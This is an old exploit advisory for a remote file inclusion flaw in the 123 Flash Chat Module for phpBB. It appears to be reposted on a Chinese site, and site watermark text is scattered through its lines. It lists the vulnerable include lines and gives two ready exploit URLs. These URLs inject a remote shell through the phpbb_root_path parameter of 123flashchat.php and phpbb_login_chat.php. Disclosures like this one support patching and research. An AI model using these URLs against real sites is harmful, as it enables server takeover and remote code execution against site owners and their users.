123 Flash Chat Module for phpBB remote file inclusion vulnerability

2008-03-03 作者:bitsCN整理来源:中国网管联盟点评 投稿 收藏

#########################################################################################
Script          : 123 Flash Chat Module for phpBB                                       #
Discovered By   : F10                                                                   #
Contact         : by_f10@hotmail.com                                                    # 网管网www_bitscn_com
Site            : http://by-f10.com                                                     #
Greetz          : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 ,                      #
                  LupuS , m0sted , CyberGhost ... .                                     #
>From            : Turkey                                                               #

网管联盟bitsCN_com

Download : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir #
######################################################################################### 网管联盟bitsCN@com

The bugs are in :

网管u家u.bitscn@com

path/123flashchat.php include($phpbb_root_path . 'extension.inc');
path/123flashchat.php include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php include($phpbb_root_path . 'common.'.$phpEx); 网管朋友网www_bitscn_net

exploitz :

网管u家bitscn.net

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell] 网管有家bitscn.net

中国网管论坛bbs.bitsCN.com

顶一下

TAGs： phpbb_root_path include common. extension.inc

上一篇：D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BOF Exploit 下一篇：Podcast Generator <= 1.0 BETA 2 RFI - File Disclosure Remote Vulnerabilities

123 Flash Chat Module for phpBB remote file inclusion vulnerability

2008-03-03 作者:bitsCN整理 来源:中国网管联盟 点评 投稿 收藏

2008-03-03 作者:bitsCN整理来源:中国网管联盟点评投稿收藏